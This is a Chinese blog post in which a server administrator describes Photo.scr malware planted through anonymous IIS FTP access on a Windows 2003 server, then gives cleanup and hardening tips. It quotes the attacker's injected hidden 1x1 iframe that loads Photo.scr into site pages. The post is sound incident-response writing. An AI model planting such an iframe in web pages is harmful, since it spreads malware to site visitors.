有段时间笔者的 win2003 服务器上出现大量 Photo.scr 病毒,庆幸的是检查任务管理器后并没有发现可疑进程,说明病毒没有被执行。
删除后没清静多少时间,这些病毒又冒出来了。
这些 Photo.scr 的路径都在 IIS 自带 FTP 的路径下,关闭 FTP 服务就不再出现了,只要一开 FTP 过段时间又会出现。
然后就认为黑客是利用了 IIS 自带的 FTP 漏洞上传的病毒文件,只要不用 FTP 时就关掉 FTP 服务。
刚刚发现原来是开了 FTP 的匿名连接导致的,只要取消 「允许匿名连接」 的勾就解决了。
这段时间笔者在给网站搬家时,发现 Defender 对网站文件进行报毒,查看后是被加入了以下恶意代码,以达到病毒传播的目的。
<iframe src=Photo.scr width=1 height=1 frameborder=0></iframe>
黑客并没有批量添加代码,只改了 2 个文件,而且不仅限是 html 文件,还有 xml 文件也没幸免,应该是黑客觉得批量添加容易被发现,所以手动添加。
清除 Photo.scr 病毒:
1 、如果没有运行它,直接搜索 Photo.scr 并删除就可以了,如果已经运行过,建议杀毒或重装系统。
2 、检查下文件有没有被添加恶意代码,虽然已经删除 Photo.scr 不会再传播,但是安全软件还是会报毒提示,如果被添加恶意代码删除即可。
安全防范建议:
1 、虽然知道了是开了 FTP 的匿名连接导致病毒上传,不过还是建议不用 FTP 的时候还是关闭它,谁知道它还会有其它的什么漏洞呢。
2 、建议 FTP 的目录不要直接设在网站目录,如需上传文件到网站目录,可以先上传到别处再通过复制或剪切到网站目录。
3 、更改 FTP 默认端口,避免被黑客的端口扫描器扫到。